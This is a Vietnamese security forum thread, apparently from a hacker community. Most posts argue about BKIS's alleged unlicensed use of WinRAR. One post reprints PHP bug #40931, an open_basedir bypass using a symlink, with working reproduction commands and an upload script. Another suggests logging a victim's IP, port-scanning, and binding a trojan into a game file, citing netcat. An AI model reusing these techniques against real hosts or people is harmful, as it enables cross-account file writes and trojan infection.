|
|
Beyon Security chỉ là 1 công cụ scan bình thường giống như acunetix, netsparker, IBM Appscan,.... nên cũng có nhiều giới hạn. Bạn vào đây xem thì hiểu : http://www.slideshare.net/itasvietnam/itasautomated-web-applicationscannervi?from=ss_embed. Chỉ tiếc cho HPT tuy mất tiền mà chẳng được lợi ích gì. Kiểm tra lại sau 2 năm vẫn thế.
|
|
|
NPham wrote:
Theo như lời anh Quảng nói trên Vietnamnet BKIS đã mua bản quyền của WinRAR ( copyright ) chứ không phải mua giấy phép sử dụng ( lisence ) của WinRAR. 2 cái này hoàn toàn khác nhau, và cái giá để mua lại copyright lớn hơn rất nhiều so với giá mua lisence. như vậy đây sẽ là 1 thương vụ lớn của RARLab và chắc chắn rằng nhân viên của RARLab sẽ nhớ ngay tới cái tên BKIS, Vietnam khi có ai nhắc đến, nhưng qua nhưng email của các bạn trên diễn đàn gửi cho RARLab tôi thấy họ còn không biết BKIS là ai cho tới khi các bạn nhắc tới và họ nói sẽ *check it*
Còn riêng tôi cũng đã gửi 1 email tới RARLab và cũng nhận được 1 reply nhưng hơi khác so với câu trả lời của RARLab với các bạn ở trên.
Vấn đề kỹ thuật bây giờ đã quá sáng tỏ chúng ta có thể tạm gác lại chưa bàn tiếp, vấn đề bây giờ ta sẽ chờ xem động thái của RARLab, họ sẽ trả lời với mọi người rằng BKIS có được phép nhúng rar.exe và BKAV Pro hay không.
Nên việc tranh luận tiếp theo tôi cảm thấy là thừa, các bạn cố gắng chờ đợi tránh lạm bàn sang hướng khác gây loãng chủ đề
P/S : Tôi tin rằng ở đâu có trong các máy tính khách hàng của BKIS chắn chắn sẽ có những bản BKAV Pro có nhúng rar.exe trước "cái giữa năm 2007" của anh Quảng.
Không loại trừ khả năng này.Ngay cả thời điểm hiện nay(việt nam gia nhập WTO)việc vi phạm của BKIS đã được chứng minh bằng kỹ thuật và pháp lý một cách rõ ràng thì khả năng vi phạm trước giữa năm 2007 còn lớn hơn.Nếu muốn làm cho ra nhẽ chỉ cần open một topic vận động mọi người cung cấp các bản BKAV trước "giữa năm 2007".tin rằng kết quả sẽ nhanh chóng có.
|
|
|
nbthanh wrote:
@chinhtruc:
http://img53.imageshack.us/my.php?image=bkavdp7.jpg
Tự xem hướng dẫn rồi tự giải câu đố của bạn nhé!
Bạn giải không được thì đi chửi BKIS ấy, đừng kiếm tôi!
Đúng như nbthanh nói.Trên trang http://www.bkav.com.vn/home/MuatheBkav2.aspx?d=9 không hề nói đến việc phải có kết nối internet để kich hoạt BKAV Pro.xin lỗi mình không xài BKAV nên không check được,nhưng chả lẽ với số lượng hơn 10 triệu bản bán ra mà bác Quảng nói.chẳng lẽ tất cả đều có kết nối internet!
|
|
|
Tớ củng chả thấy gì,sao ấy nhỉ?
|
|
|
Mình nhớ là đã post bài này rồi mà tìm lại không thấy.xin được pót lại nếu trùng các mod xóa dùm.
bài này trên http://bugs.php.net/bug.php?id=40931
Bug #40931 open_basedir bypass via symlink and move_uploaded_file()
Description:
------------
User can bypass open_basedir restriction by move_uploaded_file() if
target file path is symlink to any directory.
Reproduce code:
---------------
user1 will upload file to user2's /home/user2/public_html folder.
We have in /etc/passwd:
user1:32001:32001::/home/user1:/bin/bash
user2:32002:32002::/home/user2:/bin/bash
Target folder allows to write for anybody:
# ls -lA /home/user2
drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/
Apache have mod_php intalled. Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
ServerName user1.xxxxxxx.com
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"
</VirtualHost>
User user1 can do something like:
$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>
<?
if ( isset($_FILES["userfile"]) ) {
echo "Upload ";
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_h
tml/file.ext"))
echo "ok";
else echo "failed";
}
?>
<form name="uplform" method="post" action="<?=$PHP_SELF?>"
enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</body></html>' > upload.php
Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php after file upload
expected message
"Upload failed"
and no file
/home/user2/public_html/file.ext
in target folder.
Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php after file upload we
got message
"Upload ok"
and file
/home/user2/public_html/file.ext
well exist in target folder.
Các bác vào thảo luân với.hoặc nếu các bác có kinh nghiệm nào local áp dụng symlink thì vui lòng chia sẻ chút ít.
|
|
|
okgame_root wrote:
Vậy là mình phải bảo nó "mày mở port 3306 và vào trang check ip , đưa IP của mày + user và pass đây cho tao phá" , đúng hok ta )........
chậc ....... =.=! , hok biết phải port 3306 ko nhỉ ....
Em cũng thấy thắc mắc , nếu mình muốn tấn công vào modem của victim thì việc dụ nó để lấy IP nó trong thời gian đó ko khó , nhưng ví dụ như mình mún làm bốc khói modem victim thì phải fang vào port nào anh chị nhỉ ?
À mà nếu mình tấn công vào thì modem nó có cháy ko ta , hay modem mình cháy trước , ý em nói là ddos đó .
p/s: Em chỉ muốn biết thêm thôi chứ ko có ý phá hoại ai đâu , đừng nhìn em như thế
Nghe giống như trong phim Salomon quá vậy?
Muốn check ip của victim cũng không có gì khó,tạo một trang php chưa script ghi log IP rồi gửi cho victim.đợi victim open là mình có thể biết được IP.
Biết được IP thì có thể dùng các tool scan để quét các cổng mở,rồi...làm gì đó chả biết nữa!
Nhưng ly0kha thấy tấn công theo phương pháp lừa đảo là tốt nhất.Kiểu như bạn ghép một file trojan(server) vào một file game rồi dụ victim chạy trên máy của hắn.Trong lúc hắn đang mải mê chơi game thì ta(client)kết nối vào máy của hắn.Tớ đã từng thấy các Hacker Thổ Nhỹ Kỳ dùng netcat để làm điều này!
|
|
|
Tớ cũng vừa mới quyết định bỏ ngành xây dựng cầu đường để theo đuổi công nghệ thông tin,tớ ko muốn mỗi ngày lại nói câu "giá như".Hãy liều một phen về sở thích đi.mới có 30 mà.còn trẻ lắm.Việt Nam mình có mấy bô lão tuổi gần đất xa trời mà vẫn viết blog ko thua kém gì giới trẻ.mà sao tớ thấy cái nick cậu quen quen,chắc tớ nhầm
|
|
|
ặc,vừa rồi webmail của VBF cũng mắc lỗi này
|
|
|
|
|
|
|